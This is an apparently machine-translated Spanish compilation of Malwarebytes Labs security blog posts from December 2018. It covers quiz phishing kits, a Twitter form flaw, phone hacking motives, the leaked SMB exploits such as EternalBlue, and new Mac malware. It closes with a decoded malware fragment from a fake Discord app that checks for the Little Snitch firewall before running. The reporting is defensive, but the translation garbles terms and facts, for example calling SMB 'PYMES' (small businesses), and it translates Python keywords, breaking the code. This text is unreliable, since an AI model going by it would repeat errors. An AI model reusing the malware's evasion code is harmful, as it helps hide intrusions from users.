Ah, concursos en línea. Muchos de nosotros sabemos que, en realidad, pueden ser un tanto tontos y sin sentido, pero eso no nos impide hacer clic en el botón «Iniciar prueba». Además, tienes tiempo para matar y solo hay tres preguntas para responder, ¿verdad?
El tipo correcto de mal
Los ataques de phishing no siempre comienzan en las bandejas de entrada de su correo electrónico. Ya sea que esté en una computadora de escritorio, computadora portátil, tableta o teléfono inteligente , existen varios otros vectores donde los usuarios pueden encontrar intentos de phishing. Y créanme, no tienen un letrero luminoso de neón que podría alertar fácilmente a los usuarios de que están buscando información personal.
Los phishers han sido uno de los cibercriminales más resistentes que existen hasta la fecha. Y Katz, investigador principal de seguridad de Akamai Technologies, ha demostrado este punto una vez más.
Katz ha confirmado lo que muchos de nosotros ya hemos sospechado: los cuestionarios breves que se han compartido en Facebook, Twitter y otras redes sociales, en un informe publicado recientemente titulado “Una nueva era en Phishing: juegos, redes sociales y premios” [PDF]. Las plataformas son estafas. Y detrás de ellos hay esfuerzos sofisticados y coordinados que fueron diseñados para la exposición prolongada de los usuarios a las campañas de fraude.
Katz y su equipo han estudiado 689 campañas de phishing personalizadas que se basan en 78 nombres populares de marcas en todas las industrias. Estas marcas incluyen United Airlines, Target, Disneyland y Dunkin ‘Donuts. Todas las páginas de phishing basadas en cuestionarios siguen un formato de plantilla: hacen tres preguntas y, una vez que el usuario las responde (tenga en cuenta que no tienen que ser correctas), les prometen un premio asociado con la marca que se están haciendo pasar por alto. Por ejemplo, si el cuestionario es sobre Disneyland, los participantes podrían «ganar» pases gratuitos.
Luego, los participantes en las preguntas se dirigen a una página web que solicita información personal, por lo que pueden reclamar el premio, por supuesto, como su dirección de correo electrónico, dirección física y edad.
El kit de herramientas detrás de estas campañas de phishing “positivas”
Los kits de suplantación de identidad (phishing) son un elemento básico para el arsenal de fraude de phishing grave. Estas herramientas ingeniosas y reutilizables son populares en el mercado subterráneo porque realizan la mayor parte del trabajo con poco esfuerzo de los estafadores. También hace que la creación de campañas de phishing sea mucho más rápida.
De acuerdo con esta publicación del blog que acompaña al documento de Akamai, los kits de phish basados en cuestionarios que estudiaron utilizan las siguientes tácticas de ingeniería social para ganarse la confianza del usuario:
Un sitio web personalizado de «marca», en el que muestran logotipos y marcas de compañías de confianza que utilizan para atraer objetivos y hacer que se sientan cómodos para responder las preguntas del cuestionario.
Un llamado a la acción, en el que crean un sentido de urgencia, por lo que el objetivo probablemente complete el cuestionario o dé información sin pensarlo. Un ejemplo de esto es afirmar que el premio de alto valor solo puede ser ganado por un número limitado de participantes, por lo que necesitan avanzar.
Múltiples respaldos falsos en las redes sociales, en los que se utilizan perfiles de redes sociales falsos para fortalecer la legitimidad de la oferta de la supuesta marca. Al mostrar al objetivo que varias personas ya han ganado y reclamado el premio, el objetivo dudaría menos. También se requiere que el objetivo comparta el enlace al cuestionario en los canales de redes sociales, una estafa de encuestaclásica .
Capturas de pantalla de sitios de muestra que utilizan el mismo kit de phish para la estafa del cuestionario de tres preguntas (Cortesía de Akamai Technologies)
Otros hallazgos de la campaña de phishing
Las marcas abusadas por los phishers en su campaña son compañías que pertenecen a las aerolíneas, al por menor y las industrias de alimentos y bebidas.
El 82 por ciento de los dominios reales utilizados en estas campañas de phishing han aprovechado los errores de typosquatting .
Las versiones más recientes del kit de phishing incluyen funciones adicionales, como la traducción automática, que hace que la estafa sea accesible para personas que no hablan inglés, y nuevos perfiles de redes sociales falsos, lo que hace que la estafa sea más confiable y dinámica.
Las campañas de phishing que utilizan las redes sociales son más efectivas en comparación con el phishing tradicional.
Una nueva campaña de phishing a tener en cuenta.
Akamai ha predicho que las campañas de phishing de esta naturaleza, o aquellas que tienen un aspecto positivo en lugar de uno negativo, como en el phishing tradicional, solo aumentarán en el futuro. En lugar de usar tácticas de miedo, los phishers ahora han aprendido a explotar la mecánica del juego y aprovechar la curiosidad y el deseo de regalos de las personas. En el proceso, los phishers han hecho que los usuarios de Internet sean receptivos a ellos, sin que los usuarios se den cuenta.
Se recomienda a los usuarios que sean más vigilantes y críticos cuando se trata de ofertas de regalos en línea, independientemente de la forma en que se presenten, hasta que hayan verificado que las ofertas son legítimas. Si bien puede ser divertido perder el tiempo en las pruebas que un contacto ha compartido en Facebook, sería prudente darle un pase, y tal vez advertir al pobre compañero a través de PM que podría haber sido engañado para que entregue su información personal a estafadores
Fallo en el formulario de Twitter puede haber sido explotado
Publicado: 19 de diciembre de 2018 por Malwarebytes Labs Última actualización: 18 de diciembre de 2018
Twitter anunció en una publicación de blog el lunes que descubrieron y abordaron una falla de seguridad en uno de sus formularios de soporte. El descubrimiento se realizó el 15 de noviembre, hace más de un mes, y se reparó rápidamente al día siguiente. Desde el blog de Twitter sobre este tema:
Nos hemos dado cuenta de un problema relacionado con uno de nuestros formularios de soporte, que es usado por los titulares de las cuentas para contactar a Twitter sobre problemas con su cuenta. Esto podría usarse para descubrir el código de país de los números de teléfono de las personas si tenían uno asociado con su cuenta de Twitter, así como si Twitter había bloqueado o no su cuenta.
Continúan añadiendo:
Es importante destacar que este problema no expone números de teléfono completos ni ningún otro dato personal. Hemos informado directamente a las personas que hemos identificado como afectadas. Le enviamos este aviso más amplio, ya que es posible que otros titulares de cuentas que no podemos identificar se hayan visto afectados.
Códigos de país, llévame a casa
Si bien un código de país no es tratado o considerado por muchos como información confidencial, algunos advierten que es suficiente para dar una pista a los atacantes sobre si un número de móvil registrado (con código de país) está asociado con una cuenta de Twitter. Esto significa que los ciberdelincuentes podrían encontrar las verdaderas ubicaciones de los países de los usuarios de Twitter. Esto podría ser peligroso para aquellos en países con problemas de privacidad relacionados con la libertad de expresión.
Actualmente, Twitter está investigando la posibilidad de que los actores potenciales del estado nación hayan abusado de la falla, particularmente de las direcciones IP asociadas con Arabia Saudita y China.
Como si esto no fuera un dolor de cabeza suficiente para el gigante de los medios sociales, Peerzada Fawaz Ahmad Qureshi, un investigador de seguridad independiente que pasa por @Fawaz en Twitter, ha dado un paso adelante para revelar que había informado de la falla a Twitter a través de HackerOne, un Plataforma de recompensas de errores , hace más de dos años. Sin embargo, Twitter no realizó ninguna acción, ya que considera que el error no es crítico antes de marcar el informe como «informativo».
¡Espere! Eso no es todo
Este anuncio llega poco después de un informe de Trend Micro sobre usuarios malintencionados de Twitter que abusan de la plataforma de redes sociales para comunicarse sigilosamente con malware mediante la estenografía , el método de ocultar mensajes en imágenes. En este caso, los actores maliciosos tienen comandos ocultos en los memes que se encuentran en todos los rincones de Twitter, ocultos a simple vista en su máxima expresión.
Esta no es la primera vez que se usa Twitter como centro de comunicaciones para el malware. En 2009, se descubrió un kit de botn de bricolaje que llevó a las masas a controlar las infecciones controladas por las redes sociales, permitiendo a los autores de malware con habilidades rudimentarias utilizar Twitter para enviar comandos.
Stock, drop, y roll
Fuera de la acción del bot, la noticia de la investigación de Twitter provocó una caída dramática en los precios de las acciones de la compañía. Promete ser una montaña rusa que termina en 2018 para aquellos que intentan mantener a Twitter y sus usuarios a salvo.
Si utiliza la plataforma de redes sociales y está preocupado por una posible violación, el consejo de Twitter es simplemente: no hacer nada. Si bien estos contratiempos pueden haber sido llamados directos en lugar de visitas directas, se espera que en 2019, todos seamos un poco más proactivos, y mucho más tranquilos, sobre el uso seguro de nuestros portales y canales de comunicación favoritos.
Todas las razones por las que los cibercriminales quieren piratear tu teléfono.
Publicado: 18 de diciembre de 2018 por Kayla Matthews Última actualización: 17 de diciembre de 2018
Cuando la gente piensa en piratear, la mayoría se imagina computadoras de escritorio, computadoras portátiles o incluso cámaras de seguridad. Sin embargo, en los últimos años, los ciberdelincuentes han ampliado su repertorio para incluir también los teléfonos inteligentes. Aquí hay 10 razones por las que pueden estar buscando hackear tu teléfono.
1. Infectarlo con malware.
Muchos usuarios de teléfonos inteligentes asumen que pueden mantenerse a salvo del malware y otras amenazas al instalar aplicaciones antivirus en sus teléfonos y tener más cuidado con los sitios web que visitan. Por lo general, no esperan que sus teléfonos tengan malware fuera de la caja. Sin embargo, los investigadores demostraron que eso es lo que sucedió con más de tres docenas de modelos de Android , generalmente de marcas menos conocidas.
Los teléfonos tenían instalado un malware troyano antes de llegar a los usuarios, y el culpable parecía ser un proveedor de software en Shanghai que era un distribuidor compartido de una marca de software antivirus. Aunque no está claro qué querían hacer los piratas después de infectar los teléfonos, el malware fue particularmente difícil de eliminar. A menudo, implicaba reinstalar completamente el sistema operativo.
2. Para escuchar las llamadas.
Las personas usan sus teléfonos para hablar con sus seres queridos, hablar sobre planes de negocios, hablar sobre sus viajes, todo tipo de contenido personal e íntimo. Por lo tanto, no es sorprendente que los criminales quieran entrar y escuchar, ya sea para atacar a un objetivo o simplemente por placer voyerista. Pero, ¿cómo lo hacen?
Hay una falla en el intercambio de celulares en los EE. UU., La vulnerabilidad conocida como SS7, que permite a los piratas informáticos escuchar llamadas, leer textos y ver las ubicaciones de los usuarios después de conocer sus números de teléfono . A pesar de que las agencias estadounidenses conocen el problema, no han tomado medidas decisivas para solucionarlo, lo que pone en riesgo la privacidad de los estadounidenses.
3. robar dinero
Los ataques de ransomware causan dolores de cabeza a los usuarios de computadoras al hacer que las máquinas afectadas se bloqueen o retengan los archivos como rehenes hasta que la gente pague el rescate para restaurar el acceso. Incluso entonces, el pago no garantiza un retorno a la funcionalidad adecuada. Sin embargo, el ransomware no solo afecta a las computadoras. Hay una tendencia reciente de ransomware móvil , que a menudo se origina en aplicaciones maliciosas de terceros.
En un ejemplo, una aplicación de terceros prometió optimizar el sistema Android pero en realidad engañó a las personas para que transfirieran $ 1,000 de sus cuentas de PayPal . El proceso de inicio de sesión fue legítimo, por lo que no fue un intento de phishing. Sin embargo, una vez que la gente inició sesión, un troyano automatizó la transferencia de PayPal.
4. Para chantajear a la gente.
El crimen de chantaje no es nuevo, pero los actores de amenazas reconocen que la pequeña computadora en los bolsillos y carteras de las personas probablemente tiene más información personal almacenada que una computadora de escritorio o una computadora portátil. Y primero pueden impedir que las personas accedan a sus teléfonos antes de amenazar con filtrar la información que encuentren.
Los delincuentes pueden iniciar el pirateo después de obtener cierta información personal de una víctima que está disponible en el mercado negro debido a una violación anterior, no relacionada. Luego usan esa información para ponerse en contacto con la compañía telefónica de la víctima y hacerse pasar por el usuario, diciendo que quieren transferir el número a un nuevo teléfono. Las compañías telefónicas a menudo proporcionan dichos servicios y pueden transferir automáticamente información, incluidos números de teléfono, a un nuevo dispositivo. El problema es que, en este caso, el teléfono antiguo aún funciona, pero es inútil para la persona que lo posee.
Después de que los piratas informáticos tomen el control de un teléfono de esta manera, el escenario está preparado para delitos más graves, como el chantaje. Si una persona tenía números esenciales en su teléfono que no estaban respaldados en otra parte, fácilmente podrían sentirse presionados a ceder ante las demandas de los hackers para evitar peores consecuencias.
5. Dañar tu teléfono.
Los hackers sienten que han logrado un objetivo al provocar el caos para las víctimas. Una forma de hacerlo es hacer que el teléfono se sobrecaliente y finalmente arruinarlo. Los investigadores de seguridad advirtieron que los piratas informáticos podrían entrar en el procesador de un teléfono y utilizarlo para la criptomoneda . Además de desacelerar el teléfono, ¡también puede hacer que el teléfono se caliente demasiado o incluso que explote!
Hay muchos dispositivos de refrigeración confiables que se utilizan en los teléfonos celulares para la gestión de la temperatura, incluso las soluciones «inteligentes» de gestión de la temperatura que calientan la batería de su teléfono cuando hace demasiado frío y se enfrían cuando hace demasiado calor. Sin embargo, si los hackers se salen con la suya, incluso los componentes internos que normalmente son suficientes podrían dejar de mantener el dispositivo lo suficientemente fresco.
Un tipo de malware criptográfico llamado Loapi a menudo se oculta en aplicaciones que aparecen como juegos descargables. Los investigadores de seguridad realizaron una prueba y descubrieron que realmente hizo que la batería de un teléfono aumentara debido al calor excesivo después de solo dos días.
6. Amenazar a la seguridad nacional.
Innumerables analistas han intervenido para decir que el supuesto uso de dispositivos móviles inseguros por parte del presidente Trump podría ayudar a los adversarios extranjeros a recopilar información sobre los Estados Unidos que podría amenazar a la nación o al menos dar información sobre las acciones previstas del presidente.
En 2018, Billy Long, un congresista republicano, había pirateado su teléfono móvil y su cuenta de Twitter. Los ciberdelincuentes saben que una de las principales formas en que los políticos interactúan con sus seguidores es a través de las redes sociales.
Además de amenazar la seguridad nacional de manera más directa, estos piratas informáticos podrían erosionar la confianza que los políticos han creado con sus audiencias, especialmente con publicaciones falsas que parecen provenir de los verdaderos dueños de las cuentas.
Los ciberdelincuentes saben que al piratear los teléfonos móviles y las cuentas de redes sociales de los políticos, contribuyen a la opinión pública general de que no se puede confiar en los políticos. En lugar de buscar información en la fuente, los usuarios pueden buscar noticias a través de fuentes que son incluso menos confiables o diseñadas estratégicamente para difundir noticias falsas.
7. Por diversión o notoriedad.
Algunos hackers se emocionan al realizar sus ataques con éxito. El hacking es una fuente de entretenimiento para ellos, así como un impulso para el ego. Si el dinero no es el principal motivador para los delincuentes cibernéticos , la notoriedad podría ser un segundo lugar. Los piratas informáticos pueden entrar en los teléfonos porque es un desafío más reciente que podría requerir técnicas de desarrollo de malware más avanzadas. En última instancia, muchos ciberdelincuentes desean la aprobación de otros en la industria y desean su respeto.
8. Obtener información de pago.
Los monederos electrónicos, que almacenan la información de pago dentro de las aplicaciones de teléfonos inteligentes para que las personas no tengan que llevar tarjetas de crédito o débito reales, son convenientes. Sin embargo, su creciente popularidad ha dado a los piratas informáticos otra razón para apuntar a los teléfonos.
A menudo, los cibercriminales incitan a las personas a descargar aplicaciones de pago móviles falsas (por supuesto, creen que son reales). Luego, una vez que las personas ingresan su información de pago, los piratas informáticos tienen la información necesaria para cargar transacciones a las tarjetas.
9. Porque mucha gente lo usa.
Dado que los piratas informáticos quieren que sus ataques tengan beneficios importantes, saben que pueden aumentar sus posibilidades de tener un gran impacto al apuntar a los teléfonos inteligentes. La información publicada por el Pew Research Center muestra que el 95 por ciento de los estadounidenses posee teléfonos inteligentes . Para poner eso en perspectiva, solo el 35 por ciento de la población lo hizo en 2011, cuando la organización realizó por primera vez una encuesta sobre la propiedad de teléfonos inteligentes.
Además, una investigación diferente de otra organización revela que el uso de Internet móvil está superando al tiempo de escritorio. Las personas se sienten cada vez más cómodas con el uso de sus teléfonos inteligentes para conectarse, navegar e incluso comprar. Como tales, no importa qué tipo de hackers organizan los ciberdelincuentes, pueden encontrar muchas víctimas al enfocarse en usuarios de teléfonos inteligentes.
10. Porque es un blanco fácil.
La investigación muestra que las aplicaciones móviles tienen problemas de seguridad rampantes. Esto les da a los delincuentes la oportunidad de infiltrarse en aplicaciones inseguras en lugar de los teléfonos.
En un caso, aproximadamente 40 de las 50 aplicaciones de compras principales tenían al menos algunas vulnerabilidades de seguridad de alto nivel que permitían a los piratas informáticos ver información personal o engañar a los usuarios al atraerlos a aplicaciones peligrosas que eran copias de los originales.
Investigaciones adicionales sobre aplicaciones de citas problemáticas descubrieron que muchas de ellas brindan a terceros acceso a datos no cifrados a través de kits de desarrollo de software (SDK) vulnerables. Los hackers saben que algunas aplicaciones alcanzan cientos de miles, o incluso millones. de descargas. Si pueden acceder a ellos, obtendrán acceso rápido a los teléfonos que tienen esas aplicaciones instaladas y a las personas que las usan.
Cómo mantenerse protegido
Estos ejemplos muestran que los piratas informáticos tienen un sinnúmero de razones para hackear teléfonos y aún más formas de hacerlo realidad. Una forma fácil de protegerse contra los ataques es evitar las tiendas de aplicaciones de terceros y solo descargar contenido de las tiendas de aplicaciones legítimas del teléfono, como Google Play o iTunes. Sin embargo, los actores de amenazas también pueden penetrar en esas plataformas, y muchas aplicaciones infectadas o deshonestas se han abierto paso .
También es inteligente controlar las estadísticas del teléfono, como la duración de la batería y el número de aplicaciones en ejecución. Si se desvían demasiado de la norma, es una señal de que los piratas informáticos no son buenos para el fondo.
La ejecución de un análisis antivirus móvil al menos una vez al mes o la instalación de un programa de ciberseguridad siempre activo es otra buena estrategia, pero solo si la aplicación proviene de una fuente confiable , como el sitio oficial del proveedor.
En lugar de estar demasiado ansioso por descargar nuevas aplicaciones, lo ideal sería que la gente tenga precaución y solo lo haga si numerosas fuentes de comentarios indican que están libres de fallas de seguridad importantes. Algunas compañías de desarrollo de aplicaciones tienen tanta prisa por llegar al mercado con sus últimas ofertas que no hacen de la seguridad una prioridad.
Además de estos consejos más específicos, es esencial que las personas estén muy conscientes de cómo interactúan con sus teléfonos. Por ejemplo, las ventanas emergentes extrañas o las redirecciones en el navegador de un teléfono, o los íconos aleatorios que aparecen sin haber descargado una nueva aplicación podrían indicar problemas, y las personas no deben asumir que todo está bien. En caso de duda, es mejor dejar de usar el teléfono y obtener algunas respuestas, antes de que los piratas informáticos aprendan todo lo que necesitan saber sobre usted.
Millones afectados por el error de la API de fotos de Facebook: un problema otorgado a las aplicaciones de terceros más acceso a las fotos que normalmente debería otorgarse, incluidas las imágenes cargadas pero no publicadas. (fuente: Facebook)
Las amenazas de bomba pueden ser un engaño: un correo electrónico en circulación que exhorta a los pagos de rescate en Bitcoin para que no se detonen las bombas en los EE. UU. Puede ser una falsificación , según la policía estadounidense. (fuente: el registro)
Hombre encarcelado por delitos de fraude: un hombre en el Reino Unido ha sido encarcelado por participar en actividades fraudulentas. El principal punto de interés es seguramente el espectacular dispositivo que construyó. (fuente: Met Police)
Otro error de Google Plus: durante seis días, los desarrolladores pudieron acceder a datos de perfil quelos usuarios no hicieron públicos. (fuente: Google)
Recopilación de datos de Windows 10: los usuarios de Reddit se quejaron de que Windows 10 está capturando cierto tipo de datos, incluso con la configuración deshabilitada. (fuente: Cómo Geek)
El concierto de Taylor Swift rastrea a acosadores con software de reconocimiento facial: en un evento reciente, se implementó tecnología de vanguardia para garantizar que las multitudes estuvieran libres de posibles alborotadores . (Fuente: Rolling Stone)
El troyano Android se roba de las cuentas de PayPal: incluso con 2FA habilitado, puede que no sea suficiente para mantener seguro el saldo de su cuenta. (Fuente: ESET)
El reconocimiento de caracteres recopila las URL en los videos de YouTube: en teoría, los datos privados en los videos ocultos pueden no ser tan privados como se esperaba. (Fuente: blog de Austin Burk)
Los datos de los viajeros se quedan en las memorias USB: los agentes de frontera no son tan cuidadosos como deberían en lo que respecta a los datos de pasajeros potencialmente sensibles. (Fuente: Naked Security)
Cómo los actores de amenazas están utilizando las vulnerabilidades de las PYMES
Publicado: 14 de diciembre de 2018 por Pieter Arntz
Algunas de las variantes de malware de ransomware y troyanos más devastadoras dependen de las vulnerabilidades en el Bloqueo de mensajes del servidor de Windows (SMB) para propagarse a través de la red de una organización. Windows SMB es un protocolo utilizado por las PC para compartir archivos e impresoras, así como para acceder a servicios remotos.
Microsoft lanzó un parche para las vulnerabilidades de SMB en marzo de 2017, pero muchas organizaciones y usuarios domésticos aún no lo han aplicado. Así que ahora, los sistemas no parcheados permiten amenazas que aprovechan estas vulnerabilidades en el interior, lo que ayuda a que las campañas de malware activo se propaguen como incendios forestales de California.
Las vulnerabilidades de SMB han sido tan exitosas para los actores de amenazas que se han utilizado en algunos de los brotes de ransomware más visibles y en los sofisticados ataques de troyanos de los últimos dos años. De hecho, la telemetría de nuestro producto ha registrado 5,315 detecciones de Emotet y 6,222 de TrickBot en redes empresariales, dos variantes de troyanos que utilizan las vulnerabilidades de SMB, solo en los últimos 30 días.
¿Qué los hace tan efectivos?
Lo que hace que un malware sea tan extendido es la forma en que se propaga. Si bien las campañas masivas de spam solo generan algunas víctimas que realmente rinden frutos, una infección similar a un gusano que se sigue propagando requiere poco esfuerzo para multiplicar los rendimientos. Y eso es exactamente lo que las vulnerabilidades de SMB permiten que hagan sus cargas útiles: se extienden lateralmente a través de sistemas conectados.
Por ejemplo, el ransomware WannaCry (también conocido como WannaCrypt), que usó una de las vulnerabilidades de SMB, se lanzó en mayo de 2017, pero la infección continúa expandiéndose. A continuación se muestra el gráfico que muestra nuestra telemetría para Ransom.WannaCrypt para el mes de noviembre de 2018 .
Han pasado más de 1,5 años, y WannaCry continúa proliferando, gracias a la gran cantidad de máquinas no parcheadas conectadas a redes infectadas.
¿Cómo se llegó a esto?
En este momento, hay tres exploits en la naturaleza que utilizan vulnerabilidades de SMB. Estas hazañas han sido bautizadas como EternalBlue (usada por WannaCry y Emotet), EternalRomance (NotPetya, Bad Rabbit y TrickBot), y EternalChampion. Hay una cuarta vulnerabilidad llamada EternalSynergy, pero solo hemos visto una Prueba de concepto (PoC), nada ha aparecido todavía en la naturaleza.
Todas estas hazañas fueron filtradas por el Grupo ShadowBrokers , quien supuestamente las robó de la NSA. Menos de un mes después de que los ShadowBrokers publicaran sus «hallazgos», el primer malware completamente funcional que usó el exploit EternalBlue, WannaCry, se encontró en su hábitat natural.
Desde entonces, múltiples ataques de malware a gran escala se han basado en las vulnerabilidades de las PYMES para penetrar en las redes de las organizaciones, incluidas las campañas de ransomware NotPetya y Bad Rabbit en 2017, y ahora los ataques Emotet y TrickBot Trojan, que se han llevado a cabo durante el tercer y cuarto lugar. trimestre de 2018.
Ahora echemos un vistazo más cercano y técnico a cada exploit y cómo funcionan.
EternalBlue
Un error en el proceso de conversión de atributos extendidos de archivos (FEA) de la estructura OS2 a la estructura NT mediante la implementación de Windows SMB puede provocar un desbordamiento de búfer en el grupo del kernel no paginado. Este grupo no paginado consta de direcciones de memoria virtual que se garantiza que residen en la memoria física mientras se asignen los objetos del núcleo correspondientes.
Un desbordamiento de búfer es un defecto de programación que permite que los datos escritos en un área de memoria reservada (el búfer) salgan de los límites (desbordamiento), lo que le permite escribir datos en ubicaciones de memoria adyacentes. Esto significa que los atacantes pueden controlar el contenido de ciertas ubicaciones de memoria a las que no deberían poder acceder, que los atacantes explotan en su beneficio. En el caso de EternalBlue, pueden controlar el contenido de un montón que tiene permiso de ejecución, lo que lleva a la vulnerabilidad de ejecución remota de código (RCE), o la capacidad de ejecutar comandos en una máquina de destino a través de la red.
EternalRomance
Eternal Romance es un ataque RCE que explota CVE-2017-0145 contra el protocolo de intercambio de archivos SMBv1. Tenga en cuenta que el uso compartido de archivos a través de SMB normalmente se usa solo en redes locales, y los puertos SMB generalmente están bloqueados desde Internet por un firewall. Sin embargo, si un atacante tiene acceso a un punto extremo vulnerable que ejecuta SMB, la capacidad de ejecutar código arbitrario en el contexto del kernel desde una ubicación remota es un compromiso serio.
En el núcleo de este exploit se encuentra una vulnerabilidad de tipo confusión. Las vulnerabilidades de confusión de tipo son fallas de programación que ocurren cuando un fragmento de código no verifica el tipo de objeto que se le pasa antes de usarlo. La confusión de tipos puede permitir a un atacante introducir punteros o datos de función en el código incorrecto. En algunos casos, esto puede llevar a la ejecución del código.
En otros casos, la vulnerabilidad de la confusión de tipo conduce a una escritura de montón arbitraria, o la pulverización del montón La pulverización en heap es un método que se usa normalmente en explotaciones que coloca grandes cantidades de código en una ubicación de memoria que el atacante espera que se lea. Por lo general, estos bits de código apuntan al inicio del código real que el exploit desea ejecutar para comprometer el sistema que está bajo ataque.
Una vez finalizada la aplicación, el exploit utiliza una filtración de información en una transacción TRANS_PEEK_NMPIPE. Utiliza la filtración de información para determinar si el destino está ejecutando una versión de Windows de 32 o 64 bits y para obtener los punteros del kernel para varios objetos SMB.
Campeón Eterno
El problema explotado por EternalChampion es una condición de carrera en cómo SMBv1 maneja las transacciones. Una condición de carrera, o peligro de carrera, es el comportamiento de un sistema donde la salida depende de la secuencia o el tiempo de otros eventos incontrolables. Se convierte en un error cuando los eventos no ocurren en el orden previsto por el programador. A veces, estos errores pueden ser explotados cuando el resultado es predecible y funciona en beneficio de los atacantes.
Mientras tanto, una transacción es un tipo de solicitud que potencialmente puede abarcar varios paquetes. Por ejemplo, si una solicitud es demasiado grande para caber en un solo bloque de mensajes del servidor (SMB), se puede crear una transacción del tamaño apropiado, y esto almacenará los datos tal como se reciben de varias SMB.
Esta vulnerabilidad se explota de dos maneras: primero para una fuga de información y segundo para la ejecución remota de código. El error se explota primero para filtrar información de la agrupación a través de una lectura fuera de los límites. Para hacer esto, se envía al servidor un único paquete que contiene múltiples SMB. Este paquete contiene tres piezas relevantes:
Una solicitud de transacción primaria que se ejecutará de inmediato.
Una solicitud de transacción secundaria que activa el error causado por la condición de carrera.
Conjuntos de transacciones primarias que acumulan el grupo con la intención de colocar una estructura de transacción inmediatamente detrás de la que rastrea la primera solicitud de transacción primaria.
Primero, se crea una transacción que contiene el shellcode. Esto no inicia el exploit, solo contiene la carga útil de la segunda etapa. A continuación, se envía un paquete que contiene múltiples SMB. El paquete contiene todos los datos de transacción esperados y comienza la ejecución inmediatamente.
El controlador de transacción secundario copia los datos de la solicitud de transacción secundaria si encaja en el búfer. Excepto debido a la condición de carrera, el puntero ahora apunta a la pila del subproceso de los manejadores de solicitud de transacción primaria (a diferencia del búfer de agrupación esperado). Esto permite que un atacante escriba sus datos directamente en la pila de otro hilo.
El atacante tiene control sobre el desplazamiento, por lo que puede elegir la cantidad de datos para copiar y luego copiarlo. Esto les permite sobrescribir con precisión una dirección de retorno almacenada en la pila del subproceso del manejador de solicitud de transacción principal, y da como resultado la capacidad de ejecución remota de código.
Sinergia eterna
La Prueba de concepto para EternalSynergy muestra que los mensajes SMB entrantes son copiados por un controlador inicial en el búfer de transacción correspondiente. Pero el controlador asume automáticamente que la dirección proporcionada es el comienzo del búfer. Sin embargo, durante una transacción de escritura, se asume automáticamente que la misma dirección es el final de los datos existentes, y la dirección que apunta al comienzo del búfer se actualiza en consecuencia.
Esto significa que un atacante puede construir un mensaje secundario en la transacción para apuntar más allá del inicio del búfer, lo que resulta en un desbordamiento del búfer durante la acción de copia.
EternalRocks
Buscando información sobre estos exploits SMB, también puede encontrarse con un exploit llamado EternalRocks. EternalRocks no se incluyó en el lanzamiento de ShadowBrokers, sino que se construyó y se descubrió más tarde. EternalRocks usa siete herramientas NSA donde, por ejemplo, WannaCry solo usó dos (EternalBlue y otra llamada DoublePulsar).
Prevención y remediación.
A pesar del poder significativo que las vulnerabilidades de las PYMES tienen para los atacantes, existe un remedio simple para evitar que se vuelvan problemáticos.
Parche sus sistemas.
Los sistemas operativos de Windows vulnerables a los ataques que se encuentran en el mundo salvaje son anteriores a Windows 10. La mayoría de los ataques solo funcionan en Windows 7 y versiones anteriores, y Microsoft lanzó parches para las vulnerabilidades que se filtraron en el Boletín de seguridad de Microsoft MS17-010 . Esto deja poca o ninguna razón para que las redes sean vulnerables a estos ataques, sin embargo, el número de víctimas actuales es abrumador.
Al aplicar el parche lanzado por Microsoft en 2017, todos sus dolores de cabeza eternos pueden desaparecer mágicamente. Y como medida adicional, también le recomendamos que actualice y actualice todos los sistemas, navegadores y software lo antes posible para reforzar cualquier otra posible vulnerabilidad en la red.
Además, muchas soluciones de ciberseguridad, como Malwarebytes Endpoint Protection , ofrecen una tecnología innovadora contra la explotación que puede impedir que amenazas como EternalBlue dejen caer sus cargas útiles e infecten sistemas.
Por ejemplo, el módulo anti-exploit de Malwarebytes detectó a WannaCry como Ransom.WannaCryptdesde el principio. A continuación, creamos un mapa de calor utilizando nuestra telemetría, que muestra dónde comenzó la infección y qué tan rápido se extendió por todo el mundo.
Es por una buena razón que la mayoría de las guías de ciberseguridad aconsejan a los usuarios realizar parches rápidamente y mantener los sistemas actualizados. Muchas de las infecciones que se observan hoy podrían evitarse con un monitoreo constante y un mantenimiento básico de la computadora. Desafortunadamente, muchas empresas creen que no tienen el tiempo o la mano de obra para seguir este consejo. Pero cuando las empresas dejan sus redes desprotegidas, comprometen la integridad de todas nuestras experiencias en línea, especialmente cuando las vulnerabilidades de las PYMES permiten que las infecciones se propaguen tan rápidamente.
No seas una de esas empresas. ¡Protégete y mantente actualizado!
Ráfaga de nuevos malware para Mac cae en diciembre
Publicado: 11 de diciembre de 2018 por Thomas Reed
La semana pasada, escribimos sobre una nueva pieza de malware llamada DarthMiner . Resulta que había más cosas que ver, ya que no solo se habían detectado una, sino dos piezas de malware adicionales. El primero fue identificado por John Lambert de Microsoft y analizado por Patrick Wardle de Objective-See, y el segundo fue encontrado por Adam Thomas de Malwarebytes.
Por lo general, las macros en los documentos de Microsoft Office están en un espacio aislado, lo que significa que no deberían tener ninguna capacidad para realizar cambios en el sistema de archivos. Sin embargo, en este caso, el documento utiliza un escape de sandbox para crear un agente de inicio en el sistema. Este agente de inicio proporciona persistencia a un script de Python que configura una puertatrasera Meterpreter .
Curiosamente, este malware es un trabajo de copiar y pegar de una prueba de concepto publicada por Adam Chester en febrero, incluso para reciclar los identificadores que se refieren al sitio del blog de Chester, excepto que Chester formuló la hipótesis con EmPyre en lugar de Meterpreter como el puerta trasera.
Por supuesto, el ataque se basa en que el usuario abra un documento malicioso de Word y permita que se ejecuten las macros, por lo que la ingeniería social es la trampa principal. Mientras que nunca, nuncapermite que las macros se ejecuten en documentos de Microsoft Office, que está a salvo de este tipo de software malicioso.
Un imitador malicioso de la discordia.
El viernes, Adam Thomas encontró una copia maliciosa de Discord, una aplicación para que los jugadores se comuniquen con otros jugadores. Sin embargo, esta copia de Discord no parecía hacer nada, porque en realidad era un script de Automator que no hacía nada por el usuario.
La secuencia de comandos, que se muestra en el formulario editado anteriormente para ajustarse a una captura de pantalla, decodifica y ejecuta una carga útil de Python, luego comienza a tomar capturas de pantalla repetidamente y las carga en un servidor de comando y control (C&C).
La carga útil decodificada incluye un poco de código Python, incluidos dos fragmentos adicionales de Python codificado en base64. Uno de estos bits de código configura una puerta trasera EmPyre:
qPnQAZwbqBZ = 'PBlqIV'
import sys, urllib2; import re, subprocess; cmd = "ps -ef | grep Little \ Snitch | grep -v grep"
ps = subprocess.Popen (cmd, shell = True, stdout = subprocess.PIPE)
out = ps.stdout.read ()
ps.stdout.close ()
Si re.search ("Little Snitch", fuera):
sys.exit ()
